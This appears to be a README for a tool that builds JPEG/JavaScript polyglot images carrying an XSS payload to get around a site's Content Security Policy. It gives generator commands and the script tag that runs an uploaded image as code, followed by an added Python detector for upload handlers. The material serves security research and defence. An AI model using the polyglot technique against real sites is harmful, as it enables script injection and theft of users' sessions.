A tool inspired by: https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs
This tool automates the process of generating a polyglot JPG image that carries an XSS payload. The resulting file is a working JPG image that should pass validation by any file parser, while the embedded XSS payload can still be fired by a specially crafted XSS injection. This is useful if you have limited space to insert your payload and the Content Security Policy blocks loading external resources.
To use the tool, follow these steps:
git clone https://github.com/YouGina/JPGPolyglotGenerate.git
Download or make a normal JPG file, say input.jpg
xxd -p input.jpg | tr -d '\n' | grep -o 2a2f
If the command above prints nothing, continue; otherwise choose another image. The byte pair 2a 2f is "*/" in ASCII, which would close the JavaScript comment that hides the image data before the payload is reached. (The default xxd output groups bytes in pairs separated by spaces, so a plain grep can miss a "*/" that starts at an odd offset; the -p form with newlines removed avoids that.)
Execute the following command to insert the payload into the image:
nodejs jpg-polyglot-generate.js input.jpg output.jpg 'alert("Payload");'
To insert a payload from a file, you can also do:
nodejs jpg-polyglot-generate.js input.jpg output.jpg "$(tr -d '\n' < file.js)"
Then load the uploaded file as a script (the charset attribute keeps the browser from decoding the image bytes as UTF-8):
<script charset="ISO-8859-1" src="/upload-path/output.jpg"></script>
The image should still work as an image too:
<img src="/upload-path/output.jpg" />
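For the receiving side, here is an added example (not part of this tool or the linked research) of how an upload handler can recognise this layout: it walks the JPEG marker segments and flags a first segment whose length field is 0x2F2A (the bytes "/*") together with any "*/" inside a header segment. The JPEG skeletons it checks are constructed inline for the demonstration, not real photos.

```python
import struct

COMMENT_OPEN = 0x2F2A  # the bytes "/*" read as a big-endian segment length


def jpeg_segments(data: bytes):
    """Yield (marker, offset, payload) for each marker segment up to SOS/EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:  # EOI: nothing more to parse
            return
        if pos + 4 > len(data):
            raise ValueError(f"truncated segment header at offset {pos}")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, pos, data[pos + 4:pos + 2 + length]
        if marker == 0xDA:  # SOS: entropy-coded data follows, stop walking
            return
        pos += 2 + length


def polyglot_indicators(data: bytes) -> list[str]:
    """Return reasons the file matches the JS/JPEG polyglot layout (empty if clean)."""
    reasons = []
    for index, (marker, offset, payload) in enumerate(jpeg_segments(data)):
        # Strong signal: the very first segment length is 0x2F2A, which a browser
        # fed these bytes as script reads as the comment opener "/*".
        if index == 0 and len(payload) + 2 == COMMENT_OPEN:
            reasons.append(f"first segment FF{marker:02X} has length 0x2F2A ('/*')")
        # Weaker signal: a "*/" inside a header segment is what closes that comment.
        if b"*/" in payload:
            reasons.append(f"segment FF{marker:02X} at offset {offset} contains '*/'")
    return reasons


def build_sample(app0_len: int, tail: bytes = b"") -> bytes:
    """Constructed JPEG skeleton (SOI, APP0, COM, EOI) used only as test input."""
    filler = b"\0" * (app0_len - 7 - len(tail)) + tail  # 2 length bytes + "JFIF\0"
    app0 = b"\xff\xe0" + struct.pack(">H", app0_len) + b"JFIF\0" + filler
    com = b"\xff\xfe" + struct.pack(">H", 7) + b"hello"
    return b"\xff\xd8" + app0 + com + b"\xff\xd9"


if __name__ == "__main__":
    print(polyglot_indicators(build_sample(16)))                  # clean JFIF header
    print(polyglot_indicators(build_sample(0x2F2A, tail=b"*/")))  # polyglot shape
```

A clean JFIF header (APP0 length 16) yields no indicators, while the polyglot-shaped skeleton yields both; the length check alone is the reliable one, since a stray "*/" can occur in ordinary metadata.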